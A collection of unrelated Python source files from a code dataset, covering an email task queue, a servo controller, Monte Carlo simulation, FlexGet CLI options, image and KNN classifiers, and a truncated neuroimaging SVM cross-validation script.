print(f'Part 1: Minimum distance of crossing point: {min_manhatten}')\n\ndef part2(cable1_coords, cable2_coords, shared):\n min_steps = 10e10\n for x in shared:\n idx1 = cable1_coords.index(x)\n idx2 = cable2_coords.index(x)\n if idx1 + idx2 < min_steps:\n min_steps = idx1 + idx2\n print(f'Part 2: Minimum combined steps: {min_steps}')\n","sub_path":"2019/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"437345576","text":"from celery import Celery\nimport time\nimport sendgrid\nimport os\nfrom sendgrid.helpers.mail import *\n\n\napp = Celery('tasks', broker='redis://192.168.118.130:6379/0',\n backend=\"redis://192.168.118.130:6379/0\")\n\n\n@app.task\ndef send_mail(email):\n sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))\n from_email = Email(\"18804928235@163.com\")\n to_email = Email(email)\n subject = \"Sending with SendGrid is Fun\"\n content = Content(\"text/plain\", \"and easy to do anywhere, even with Python\")\n mail = Mail(from_email, subject, to_email, content)\n response = sg.client.mail.send.post(request_body=mail.get())\n print(response.status_code)\n print(response.body)\n print(response.headers)\n","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"474801159","text":"import RPi.GPIO as GPIO\nimport time\nimport signal\nimport atexit\n\natexit.register(GPIO.cleanup)\n\nGPIO.setmode(GPIO.BOARD)\n\nGPIO.setup(11,GPIO.OUT)\n#GPIO.setup(11,GPIO.IN)\nGPIO.output(11, False)\n\np = GPIO.PWM(11, 50)\np.start(9)\ntime.sleep(2)\n\nwhile(True):\n\tfor i in range(0,181,10):\n\t\tp.ChangeDutyCycle(2.5 + 10 * i / 180)\n\t\ttime.sleep(0.02)\n\t\tp.ChangeDutyCycle(0)\n\t\ttime.sleep(0.2)\n \n\tfor i in range(181,0,-10):\n\t\tp.ChangeDutyCycle(2.5 + 10 * i / 180)\n\t\ttime.sleep(0.02)\n\t\tp.ChangeDutyCycle(0)\n\t\ttime.sleep(0.2)\n","sub_path":"SG90.py","file_name":"SG90.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"408824987","text":"# Functions for running Monte Carlo 
algorithm\n\nimport numpy as np\nimport pandas as pd\nimport multiprocessing as mp\nimport os\nimport sys\n\nimport time\nimport datetime\n\ndef write(logfile, msg):\n \"\"\"\n Write to both sys.stdout and to a logfile.\n \"\"\"\n logfile = open(logfile.name, 'a+')\n logfile.write(msg)\n sys.stdout.write(msg)\n sys.stdout.flush()\n logfile.close()\n\ndef multilevel_mc(path, qin, qout):\n \"\"\"\n In this function the XBeach model is run\n \"\"\"\n os.chdir(path)\n for (nf, lmax, lmin, normalisation_factor, build_output, sigma_function, variable_name, interp_fn_orig, angles_fn, instat_type) in iter(qin.get, 'stop'):\n sigma = sigma_function()\n outputf = build_output(path, nf, sigma, variable_name, interp_fn_orig, angles_fn, lmax, lmin, instat_type, normalisation_factor)\n\n qout.put(outputf)\n\n\ndef _parallel_mc_mc(processes, path_stem, calc_formula, nf, lmax, lmin, normalisation_factor, build_output, variable_name, sigma_function, interp_fn_orig, angles_fn, instat_type, iteration):\n\n \"\"\"\n Split the tasks so the algorithm be parallelised and then collect the parallel output\n \"\"\"\n \n # putting runs into queue\n in_queue = mp.Queue()\n out_queue = mp.Queue()\n future_res = []\n for i in range(processes):\n path = path_stem + str(i) + '/'\n if not os.path.exists(path):\n os.makedirs(path)\n \n future_res.append(mp.Process(target = calc_formula, args = (path, in_queue, out_queue)))\n future_res[-1].start()\n\n for j in range(iteration):\n if (j+1)%1000 == 0:\n print(j)\n in_queue.put((nf, lmax, lmin, normalisation_factor, build_output, sigma_function, variable_name, interp_fn_orig, angles_fn, instat_type))\n # send stop signals\n for i in range(processes):\n in_queue.put('stop')\n \n # collect output \n results = []\n for i in range(iteration):\n if (i+1)%1000 == 0:\n print(i)\n results.append(out_queue.get())\n\n outputf = [f for f in results]\n \n return outputf\n\n\n\ndef monte_carlo_main(N0, nf, lmax, lmin, normalisation_factor, build_output, path_stem, sample, variable_name, processes, interp_fn_orig, angles_fn, instat_type):\n \n \"\"\"\n Runs Monte Carlo algorithm\n \n N0: number of samples\n nf: number of meshgrid points\n lmax: maximum level considered by MLMC algo\n lmin: minimum level comsidered by MLMC algo\n normalisation_factor: factor by which the output is divided by\n build_output: function which defines the XBeach inputs files, runs XBeach and outputs results\n path_stem: location where XBeach input and output files are dumped\n sample: function used to generate random number\n variable_name: name of uncertain parameter\n processes: number of parallel runs\n interp_fn_orig: interpolation function used to generate new beds for different x and y grids\n angles_fn: interpolation function used to store bed angle for all values of y\n instat_type: wavetype used\n \n \"\"\"\n\n ts = time.time()\n st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n \n # output file of key stats\n filename = \"monte_carlo_real_answer_bedslope_\" + st + \".txt\"\n logfile = open(filename, \"w+\")\n logfile.close()\n\n\n t0 = time.time()\n # run MC algorithm\n outputf = _parallel_mc_mc(processes, path_stem, multilevel_mc, nf, lmax, lmin, normalisation_factor, build_output, variable_name, sample, interp_fn_orig, angles_fn, instat_type, N0)\n \n t1 = time.time()\n \n # csv of all MC samples from this run\n csv_name = \"average_output_\" + st + \".csv\"\n\n pd.DataFrame(outputf).to_csv(csv_name, index = False)\n \n logfile = open(filename, \"a+\")#, 0)\n\n write(logfile, 
\"Number of samples: %0d \" % N0)\n write(logfile, \"Total time: %f \" % (t1-t0))\n write(logfile, \"Monte Carlo real value: %f \" % (np.mean(outputf)))\n write(logfile, \"Monte Carlo error: %f \" % (np.sqrt(np.var(outputf)/len(outputf))))\n\n logfile.close()\n\n print('total time: ' + str(t1 - t0))\n print('expected value: ' + str(np.mean(outputf)))\n\n\n return np.mean(outputf), np.sqrt(np.var(outputf)/len(outputf)), filename\n","sub_path":"morphological_files/monte_carlo_fn.py","file_name":"monte_carlo_fn.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"161814282","text":"from __future__ import unicode_literals, division, absolute_import\nimport sys\nfrom argparse import ArgumentParser as ArgParser, Action, ArgumentError, SUPPRESS, _VersionAction\n\nimport flexget\nfrom flexget.utils.tools import console\nfrom flexget.utils import requests\n\n\ndef required_length(nmin, nmax):\n \"\"\"Generates a custom Action to validate an arbitrary range of arguments.\"\"\"\n class RequiredLength(Action):\n def __call__(self, parser, args, values, option_string=None):\n if not nmin <= len(values) <= nmax:\n raise ArgumentError(self, 'requires between %s and %s arguments' % (nmin, nmax))\n setattr(args, self.dest, values)\n return RequiredLength\n\n\nclass VersionAction(_VersionAction):\n \"\"\"\n Action to print the current version.\n Also attempts to get more information from git describe if on git checkout.\n \"\"\"\n def __call__(self, parser, namespace, values, option_string=None):\n self.version = flexget.__version__\n # Print the version number\n console('%s' % self.version)\n if self.version == '{git}':\n console('To check the latest released version you have run:')\n console('`git fetch --tags` then `git describe`')\n else:\n # Check for latest version from server\n try:\n page = requests.get('http://download.flexget.com/latestversion')\n except requests.RequestException:\n console('Error getting latest version number from download.flexget.com')\n else:\n ver = page.text.strip()\n if self.version == ver:\n console('You are on the latest release.')\n else:\n console('Latest release: %s' % ver)\n parser.exit()\n\n\nclass DebugAction(Action):\n def __call__(self, parser, namespace, values, option_string=None):\n setattr(namespace, self.dest, True)\n namespace.log_level = 'debug'\n\n\nclass DebugTraceAction(Action):\n def __call__(self, parser, namespace, values, option_string=None):\n setattr(namespace, self.dest, True)\n namespace.debug = True\n namespace.log_level = 'trace'\n\n\nclass CronAction(Action):\n def __call__(self, parser, namespace, values, option_string=None):\n setattr(namespace, self.dest, True)\n namespace.loglevel = 'info'\n\n\nclass CoreArgumentParser(ArgParser):\n \"\"\"Overrides some default ArgumentParser behavior\"\"\"\n\n def __init__(self, **kwargs):\n # Do this early, so even option processing stuff is caught\n if '--bugreport' in sys.argv:\n self._debug_tb_callback()\n\n ArgParser.__init__(self, **kwargs)\n\n def error(self, message):\n \"\"\"Overridden error handler to print help message\"\"\"\n sys.stderr.write('error: %s\\n' % message)\n self.print_help()\n sys.exit(2)\n\n def add_argument(self, *args, **kwargs):\n if isinstance(kwargs.get('nargs'), basestring) and '-' in kwargs['nargs']:\n # Handle a custom range of arguments\n min, max = kwargs['nargs'].split('-')\n min, max = int(min), int(max)\n kwargs['action'] = required_length(min, max)\n # Make the usage 
string a bit better depending on whether the first argument is optional\n if min == 0:\n kwargs['nargs'] = '*'\n else:\n kwargs['nargs'] = '+'\n super(CoreArgumentParser, self).add_argument(*args, **kwargs)\n\n def parse_args(self, args=None, namespace=None):\n if args is None:\n # Decode all arguments to unicode before parsing\n args = [unicode(arg, sys.getfilesystemencoding()) for arg in sys.argv[1:]]\n return super(CoreArgumentParser, self).parse_args(args, namespace)\n\n def _debug_tb_callback(self, *dummy):\n import cgitb\n cgitb.enable(format=\"text\")\n\n\ncore_parser = CoreArgumentParser()\n\ncore_parser.add_argument('-V', '--version', action=VersionAction, help='Print FlexGet version and exit.')\ncore_parser.add_argument('--test', action='store_true', dest='test', default=0,\n help='Verbose what would happen on normal execution.')\ncore_parser.add_argument('-c', dest='config', default='config.yml',\n help='Specify configuration file. Default is config.yml')\ncore_parser.add_argument('--logfile', default='flexget.log',\n help='Specify a custom logfile name/location. '\n 'Default is flexget.log in the config directory.')\n# TODO: rename dest to cron, since this does more than just quiet\ncore_parser.add_argument('--cron', action=CronAction, dest='quiet', default=False, nargs=0,\n help='Use when scheduling FlexGet with cron or other scheduler. Allows background '\n 'maintenance to run. Disables stdout and stderr output. Reduces logging level.')\n# This option is already handled above.\ncore_parser.add_argument('--bugreport', action='store_true', dest='debug_tb',\n help='Use this option to create a detailed bug report, '\n 'note that the output might contain PRIVATE data, so edit that out')\n# provides backward compatibility to --cron and -d\ncore_parser.add_argument('-q', '--quiet', action=CronAction, dest='quiet', default=False, nargs=0,\n help=SUPPRESS)\ncore_parser.add_argument('--debug', action=DebugAction, nargs=0, help=SUPPRESS)\ncore_parser.add_argument('--debug-trace', action=DebugTraceAction, nargs=0, help=SUPPRESS)\ncore_parser.add_argument('--loglevel', default='verbose',\n choices=['none', 'critical', 'error', 'warning', 'info', 'verbose', 'debug', 'trace'],\n help=SUPPRESS)\ncore_parser.add_argument('--debug-sql', action='store_true', default=False, help=SUPPRESS)\ncore_parser.add_argument('--experimental', action='store_true', default=False, help=SUPPRESS)\ncore_parser.add_argument('--del-db', action='store_true', dest='del_db', default=False, help=SUPPRESS)\ncore_parser.add_argument('--profile', action='store_true', default=False, help=SUPPRESS)\ncore_parser.add_argument('--log-start', action='store_true', dest='log_start', default=0, help=SUPPRESS)\n\ncore_subparsers = core_parser.add_subparsers(title='Commands', metavar='<command>', dest='subcommand')\n\nexec_parser = core_subparsers.add_parser('exec', help='execute tasks now')\n\nexec_parser.add_argument('--check', action='store_true', dest='validate', default=0,\n help='Validate configuration file and print errors.')\nexec_parser.add_argument('--learn', action='store_true', dest='learn', default=0,\n help='Matches are not downloaded but will be skipped in the future.')\n# Plugins should respect these flags where appropriate\nexec_parser.add_argument('--retry', action='store_true', dest='retry', default=0, help=SUPPRESS)\nexec_parser.add_argument('--no-cache', action='store_true', dest='nocache', default=0,\n help='Disable caches. 
Works only in plugins that have explicit support.')\n\n\ndef add_subparser(name, func, **kwargs):\n subparser = core_subparsers.add_parser(name, **kwargs)\n subparser.set_defaults(func=func)\n return subparser\n\n\ndef get_subparser(name):\n core_subparsers.choices.get(name)\n","sub_path":"flexget/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":7364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"307272688","text":"from keras.preprocessing.image import ImageDataGenerator\nimport matplotlib.image as mpimg\nimport os.path\nimport numpy as np\nimport os\nimport json\nimport keras.models\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.utils import np_utils\nfrom sklearn.cross_validation import train_test_split\nimport matplotlib.pyplot as plt\nfrom glob import glob\nfrom keras.callbacks import ReduceLROnPlateau, EarlyStopping\nfrom keras.layers import Dense, Dropout, Activation, Flatten, Input\nfrom keras.layers import Convolution2D, MaxPooling2D, ZeroPadding2D, GlobalAveragePooling2D, AveragePooling2D\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.models import Sequential, Model\nfrom keras.optimizers import Adam, SGD\nfrom keras.applications.vgg16 import VGG16\nfrom PIL import Image\nfrom keras import regularizers\nfrom keras.callbacks import ModelCheckpoint, CSVLogger\n\nsize_image = 96\ndata = {}\ndata['data'] = []\n\npaths = 'food/train'\n\n\ndef getSum(path):\n sum = 0\n for d in os.listdir(path):\n num = len(os.listdir(os.path.join(path, d)))\n sum += num\n return sum\n\n\nsum = getSum(paths)\nY_all = np.zeros(sum)\nX_all = np.zeros((sum, size_image, size_image, 3), dtype='float64')\n\n\ndef init(path):\n count_X = 0\n label = 0\n\n for d in os.listdir(path):\n if os.path.isdir(os.path.join(path, d)):\n for img in os.listdir(os.path.join(path, d)):\n if img.endswith(\"jpg\"):\n image = Image.open(os.path.join(os.path.join(path, d), img))\n image = image.resize((size_image, size_image), Image.ANTIALIAS)\n image = np.array(image)\n X_all[count_X] = image\n Y_all[count_X] = label\n count_X += 1\n\n data['data'].append({\n 'id': label,\n 'name': d\n })\n label += 1\n with open('data_incep.txt', 'w') as outfile:\n json.dump(data, outfile)\n\n\ndef models():\n model = Sequential()\n model.add(Convolution2D(64, (3, 3), activation='relu', input_shape=(size_image, size_image, 3)))\n model.add(Convolution2D(64, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Convolution2D(128, (3, 3)))\n model.add(Activation('relu'))\n model.add(Convolution2D(128, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Convolution2D(256, (3, 3)))\n model.add(Activation('relu'))\n model.add(Convolution2D(256, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Convolution2D(512, (3, 3)))\n model.add(Activation('relu'))\n model.add(Convolution2D(512, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Flatten())\n model.add(Dense(512, activation='relu',\n kernel_regularizer=regularizers.l2(0.01),\n ))\n model.add(Dropout(0.5))\n\n model.add(Dense(sum_laber, activation='softmax'))\n\n return model\n\n\n#\nif __name__ == '__main__':\n init(paths)\n sum_laber = len(os.listdir(paths))\n\n Y_all = np_utils.to_categorical(Y_all, sum_laber)\n X_all /= 255.0\n\n X_train, X_test, Y_train, Y_test = 
train_test_split(X_all, Y_all, test_size=0.2, random_state=42)\n\n datagen = ImageDataGenerator(\n featurewise_center=False, # set input mean to 0 over the dataset\n samplewise_center=False, # set each sample mean to 0\n featurewise_std_normalization=False, # divide inputs by std of the dataset\n samplewise_std_normalization=False, # divide each input by its std\n zca_whitening=False, # apply ZCA whitening\n rotation_range=10, # randomly rotate images in the range (degrees, 0 to 180)\n width_shift_range=0.125, # randomly shift images horizontally (fraction of total width)\n height_shift_range=0.125, # randomly shift images vertically (fraction of total height)\n horizontal_flip=True, # randomly flip images\n vertical_flip=False, # randomly flip images\n # rescale=1. / 255,\n fill_mode='nearest')\n datagen.fit(X_train)\n\n # generator = datagen.flow(X_train, Y_train, batch_size=32)\n # val_generator = datagen.flow(X_test, Y_test, batch_size=32)\n\n base_model = InceptionV3(weights='imagenet', include_top=False, input_tensor=Input(shape=(96, 96, 3)))\n x = base_model.output\n x = GlobalAveragePooling2D()(x)\n # # x = Flatten()(x)\n x = Dense(4096)(x)\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n x = Dropout(.5)(x)\n predictions = Dense(sum_laber, activation='softmax')(x)\n\n model = Model(input=base_model.input, output=predictions)\n # model = VGG16()\n\n for layer in model.layers[:172]:\n layer.trainable = False\n for layer in model.layers[172:]:\n layer.trainable = True\n\n model.compile(optimizer=SGD(lr=0.01, momentum=0.9),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n checkpointer = ModelCheckpoint(filepath='models_incep.h5', verbose=1, save_best_only=True)\n csv_logger = CSVLogger('train_incep.csv')\n\n model.fit_generator(datagen.flow(X_train, Y_train, batch_size=32),\n steps_per_epoch=X_train.shape[0] / 32,\n validation_data=datagen.flow(X_test, Y_test, batch_size=32),\n epochs=50,\n callbacks=[checkpointer, csv_logger],\n validation_steps=Y_train.shape[0] / 32,\n )\n\n score = model.evaluate(X_test, Y_test, verbose=1)\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"InceptionV3.py","file_name":"InceptionV3.py","file_ext":"py","file_size_in_byte":5695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"71418029","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport csv\n\n# inputdata\ndataset = pd.read_excel(\"Data.xlsx\", index_col=0) # index_col for removing the data from dataset\n\ndummy = pd.get_dummies(dataset['Gender'])\nprint(dummy)\ndataset1 = pd.concat((dataset, dummy), axis=1)\ndataset1 = dataset1.drop(['Gender', 'female'], axis=1)\ndataset1 = dataset1.rename(columns={\"male\": \"sex\"})\n\ndummy1 = pd.get_dummies(dataset['corona_result'])\nprint(dummy1)\ndataset2 = pd.concat((dataset1, dummy1), axis=1)\ndataset2 = dataset2.drop(['positive', 'corona_result'], axis=1)\ndataset2 = dataset2.rename(columns={\"negative\": \"Test_result\"})\n\nprint(dataset1)\nprint(dataset2)\n\n\n# caluclating values of means&varience\n\nfrom sklearn.preprocessing import StandardScaler\n\nscaler = StandardScaler()\n\nscaler.fit(dataset2.drop('Test_result', axis=1))\nscaled_features = scaler.transform(dataset2.drop('Test_result', axis=1))\ndataset_feat = pd.DataFrame(scaled_features, columns=dataset2.columns[:-1])\nprint(dataset_feat)\n\n# Train Test Split Data and Use KNN model from sklearn library\n\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, 
X_test, y_train, y_test = train_test_split(scaled_features, dataset2['Test_result'], test_size=0.30)\n\n# Remember that we are trying to come up\n# with a model to predict whether\n# someone will TARGET CLASS or not.\n# We'll start with k = 3.\n\nfrom sklearn.neighbors import KNeighborsClassifier\n\nknn = KNeighborsClassifier(n_neighbors=3)\n\nknn.fit(X_train, y_train)\npred = knn.predict(X_test)\n\n# Predictions and Evaluations\n# Let's evaluate our KNN model !\nfrom sklearn.metrics import classification_report, confusion_matrix\n\nprint(confusion_matrix(y_test, pred))\n\nprint(classification_report(y_test, pred))\n\n# Choosing a K Value:\n\nerror_rate = []\n\n# Will take some time\nfor i in range(1, 6):\n knn = KNeighborsClassifier(n_neighbors=i)\n knn.fit(X_train, y_train)\n pred_i = knn.predict(X_test)\n error_rate.append(np.mean(pred_i != y_test))\n\nplt.figure(figsize=(10, 6))\nplt.plot(range(1, 6), error_rate, color='blue', linestyle='dashed', marker='o', markerfacecolor='green', markersize=20)\n\nplt.title('Error Rate vs. K Value')\nplt.xlabel('K')\nplt.ylabel('Error Rate')\nplt.show()\n\n# FIRST A QUICK COMPARISON TO OUR ORIGINAL K = 3\nknn = KNeighborsClassifier(n_neighbors=3)\n\nknn.fit(X_train, y_train)\npred = knn.predict(X_test)\n\nprint('WITH K = 3')\nprint('\\n')\nprint(confusion_matrix(y_test, pred))\nprint('\\n')\nprint(classification_report(y_test, pred))\n\n# NOW WITH K = 2\nknn = KNeighborsClassifier(n_neighbors=2)\n\nknn.fit(X_train, y_train)\npred = knn.predict(X_test)\n\nprint('WITH K = 2')\nprint('\\n')\nprint(confusion_matrix(y_test, pred))\nprint('\\n')\nprint(classification_report(y_test, pred))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"439981110","text":"\n\nimport os\nimport json\nimport numpy as np\nfrom sklearn.cross_validation import StratifiedKFold\nimport nibabel\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom sklearn.feature_selection import SelectKBest\nfrom parsimony.estimators import LogisticRegressionL1L2TV\nimport parsimony.functions.nesterov.tv as tv_helper\nimport brainomics.image_atlas\nimport parsimony.algorithms as algorithms\nimport parsimony.datasets as datasets\nimport parsimony.functions.nesterov.tv as nesterov_tv\nimport parsimony.estimators as estimators\nimport parsimony.algorithms as algorithms\nimport parsimony.utils as utils\nfrom scipy.stats import binom_test\nfrom collections import OrderedDict\nfrom sklearn import preprocessing\nfrom sklearn.metrics import roc_auc_score, recall_score\nfrom collections import OrderedDict\nimport pandas as pd\nimport shutil\nimport os\nimport json\nimport numpy as np\nfrom sklearn.cross_validation import StratifiedKFold\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom scipy.stats import binom_test\nfrom collections import OrderedDict\nfrom sklearn import preprocessing\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn import svm\nfrom brainomics import array_utils\nimport mapreduce\nfrom sklearn.metrics import recall_score, roc_auc_score, precision_recall_fscore_support\nfrom statsmodels.stats.inter_rater import fleiss_kappa\n\n\nWD = '/neurospin/brainomics/2016_schizConnect/analysis/all_studies+VIP/Freesurfer/all_subjects/results/learning_curve_centered_by_site_all/inter_site/ratio_0.6'\ndef config_filename(): return os.path.join(WD,\"config_dCV.json\")\ndef results_filename(): return 
os.path.join(WD,\"results_dCV.xlsx\")\n\nNFOLDS_OUTER = 4 #number of sites\nNFOLDS_INNER = 5\npenalty_start = 3\n#############################################################################\n\n\n\ndef load_globals(config):\n import mapreduce as GLOBAL # access to global variables\n GLOBAL.DATA = GLOBAL.load_data(config[\"data\"])\n\n\ndef resample(config, resample_nb):\n import mapreduce as GLOBAL # access to global variables\n GLOBAL.DATA = GLOBAL.load_data(config[\"data\"])\n resample = config[\"resample\"][resample_nb]\n GLOBAL.DATA_RESAMPLED = {k: [GLOBAL.DATA[k][idx, ...] for idx in resample]\n for k in GLOBAL.DATA}\n\ndef mapper(key, output_collector):\n import mapreduce as GLOBAL\n Xtr = GLOBAL.DATA_RESAMPLED[\"X\"][0]\n Xte = GLOBAL.DATA_RESAMPLED[\"X\"][1]\n ytr = GLOBAL.DATA_RESAMPLED[\"y\"][0]\n yte = GLOBAL.DATA_RESAMPLED[\"y\"][1]\n\n\n c = float(key[0])\n print(\"c:%f\" % (c))\n\n class_weight=\"auto\" # unbiased\n\n mask = np.ones(Xtr.shape[0], dtype=bool)\n\n scaler = preprocessing.StandardScaler().fit(Xtr)\n Xtr = scaler.transform(Xtr)\n Xte=scaler.transform(Xte)\n\n mod = svm.LinearSVC(C=c,fit_intercept=False,class_weight= class_weight)\n\n mod.fit(Xtr, ytr.ravel())\n y_pred = mod.predict(Xte)\n y_proba_pred = mod.decision_function(Xte)\n ret = dict(y_pred=y_pred, y_true=yte,prob_pred = y_proba_pred, beta=mod.coef_, mask=mask)\n if output_collector:\n output_collector.collect(key, ret)\n else:\n return ret\n\ndef scores(key, paths, config):\n key_parts = key.split(\"_\")\n values = [mapreduce.OutputCollector(p) for p in paths]\n try:\n values = [item.load() for item in values]\n except Exception as e:\n print(e)\n return None\n\n y_true_splits = [item[\"y_true\"].ravel() for item in values]\n y_pred_splits = [item[\"y_pred\"].ravel() for item in values]\n y_true = np.concatenate(y_true_splits)\n y_pred = np.concatenate(y_pred_splits)\n prob_pred_splits = [item[\"prob_pred\"].ravel() for item in values]\n prob_pred = np.concatenate(prob_pred_splits)\n\n # Prediction performances\n p, r, f, s = precision_recall_fscore_support(y_true, y_pred, average=None)\n auc = roc_auc_score(y_true, prob_pred)\n\n # balanced accuracy (recall_mean)\n bacc_splits = [recall_score(y_true_splits[f], y_pred_splits[f], average=None).mean() for f in range(len(y_true_splits))]\n auc_splits = [roc_auc_score(y_true_splits[f], prob_pred_splits[f]) for f in range(len(y_true_splits))]\n\n print(\"bacc all - mean(bacc) %.3f\" % (r.mean() - np.mean(bacc_splits)))\n # P-values\n success = r * s\n success = success.astype('int')\n prob_class1 = np.count_nonzero(y_true) / float(len(y_true))\n pvalue_recall0_true_prob = binom_test(success[0], s[0], 1 - prob_class1,alternative = 'greater')\n pvalue_recall1_true_prob = binom_test(success[1], s[1], prob_class1,alternative = 'greater')\n pvalue_recall0_unknwon_prob = binom_test(success[0], s[0], 0.5,alternative = 'greater')\n pvalue_recall1_unknown_prob = binom_test(success[1], s[1], 0.5,alternative = 'greater')\n pvalue_bacc = binom_test(success[0]+success[1], s[0] + s[1], p=0.5,alternative = 'greater')\n\n\n # Beta's measures of similarity\n betas = np.hstack([item[\"beta\"][:, penalty_start:].T for item in values]).T\n # Correlation\n R = np.corrcoef(betas)\n R = R[np.triu_indices_from(R, 1)]\n # Fisher z-transformation / average\n z_bar = np.mean(1. / 2. 
* np.log((1 + R) / (1 - R)))\n # back-transform\n r_bar = (np.exp(2 * z_bar) - 1) / (np.exp(2 * z_bar) + 1)\n\n # threshold betas to compute fleiss_kappa and DICE\n try:\n betas_t = np.vstack([\n array_utils.arr_threshold_from_norm2_ratio(betas[i, :], .99)[0]\n for i in range(betas.shape[0])])\n # Compute fleiss kappa statistics\n beta_signed = np.sign(betas_t)\n table = np.zeros((beta_signed.shape[1], 3))\n table[:, 0] = np.sum(beta_signed == 0, 0)\n table[:, 1] = np.sum(beta_signed == 1, 0)\n table[:, 2] = np.sum(beta_signed == -1, 0)\n fleiss_kappa_stat = fleiss_kappa(table)\n\n # Pair-wise Dice coefficient\n ij = [[i, j] for i in range(betas.shape[0]) for j in range(i+1, betas.shape[0])]\n dices = list()\n for idx in ij:\n A, B = beta_signed[idx[0], :], beta_signed[idx[1], :]\n dices.append(float(np.sum((A == B)[(A != 0) & (B != 0)])) / (np.sum(A != 0) + np.sum(B != 0)))\n dice_bar = np.mean(dices)\n except:\n # keep the names used below defined even if thresholding fails\n betas_t = np.zeros_like(betas)\n dices = []\n dice_bar = fleiss_kappa_stat = 0\n\n # Proportion of selection within the support across the CV\n support_count = (betas_t != 0).sum(axis=0)\n support_count = support_count[support_count > 0]\n support_prop = support_count / betas_t.shape[0]\n\n scores = OrderedDict()\n scores['key'] = key\n scores['recall_0'] = r[0]\n scores['recall_1'] = r[1]\n scores['bacc'] = r.mean()\n scores['bacc_se'] = np.std(bacc_splits) / np.sqrt(len(bacc_splits))\n scores[\"auc\"] = auc\n scores['auc_se'] = np.std(auc_splits) / np.sqrt(len(auc_splits))\n scores['pvalue_recall0_true_prob_one_sided'] = pvalue_recall0_true_prob\n scores['pvalue_recall1_true_prob_one_sided'] = pvalue_recall1_true_prob\n scores['pvalue_recall0_unknwon_prob_one_sided'] = pvalue_recall0_unknwon_prob\n scores['pvalue_recall1_unknown_prob_one_sided'] = pvalue_recall1_unknown_prob\n scores['pvalue_bacc_mean'] = pvalue_bacc\n scores['prop_non_zeros_mean'] = float(np.count_nonzero(betas_t)) / \\\n float(np.prod(betas.shape))\n scores['beta_r_bar'] = r_bar\n scores['beta_fleiss_kappa'] = fleiss_kappa_stat\n scores['beta_dice_bar'] = dice_bar\n scores['beta_dice'] = str(dices)\n scores['beta_r'] = str(R)\n scores['beta_support_prop_select_mean'] = support_prop.mean()\n scores['beta_support_prop_select_sd'] = support_prop.std()\n\n\n return scores\n\ndef reducer(key, values):\n import os, glob, pandas as pd\n os.chdir(os.path.dirname(config_filename()))\n config = json.load(open(config_filename()))\n paths = glob.glob(os.path.join(config['map_output'], \"*\", \"*\", \"*\"))\n #paths = [p for p in paths if not p.count(\"0.8_-1\")]\n\n def close(vec, val, tol=1e-4):\n return np.abs(vec - val) < tol\n\n def groupby_paths(paths, pos):\n groups = {g:[] for g in set([p.split(\"/\")[pos] for p in paths])}\n for p in paths:\n groups[p.split(\"/\")[pos]].append(p)\n return groups\n\n def argmaxscore_bygroup(data, groupby='fold', param_key=\"key\", score=\"bacc\"):\n arg_max_byfold = list()\n for fold, data_fold in data.groupby(groupby):\n# assert len(data_fold) == len(set(data_fold[param_key])) # ensure all param are diff\n arg_max_byfold.append([fold, data_fold.ix[data_fold[score].argmax()][param_key], data_fold[score].max()])\n return pd.DataFrame(arg_max_byfold, columns=[groupby, param_key, score])\n\n print('## Refit scores')\n print('## ------------')\n byparams = groupby_paths([p for p in paths if p.count(\"all\") and not p.count(\"all/all\")],3)\n byparams_scores = {k:scores(k, v, config) for k, v in byparams.items()}\n\n data = [list(byparams_scores[k].values()) for k in byparams_scores]\n\n columns = 
list(byparams_scores[list(byparams_scores.keys())[0]].keys())\n scores_refit = pd.DataFrame(data, columns=columns)\n\n print('## doublecv scores by outer-cv and by params')\n print('## -----------------------------------------')\n data = list()\n bycv = groupby_paths([p for p in paths if p.count(\"cvnested\")],1)\n for fold, paths_fold in bycv.items():\n print(fold)\n byparams = groupby_paths([p for p in paths_fold], 3)\n byparams_scores = {k:scores(k, v, config) for k, v in byparams.items()}\n data += [[fold] + list(byparams_scores[k].values()) for k in byparams_scores]\n scores_dcv_byparams = pd.DataFrame(data, columns=[\"fold\"] + columns)\n\n\n print('## Model selection')\n print('## ---------------')\n svm = argmaxscore_bygroup(scores_dcv_byparams); svm[\"method\"] = \"svm\"\n\n scores_argmax_byfold = svm\n\n print('## Apply best model on refited')\n print('## ---------------------------')\n scores_svm = scores(\"nestedcv\", [os.path.join(config['map_output'], row[\"fold\"], \"all\", row[\"key\"]) for index, row in svm.iterrows()], config)\n\n\n scores_cv = 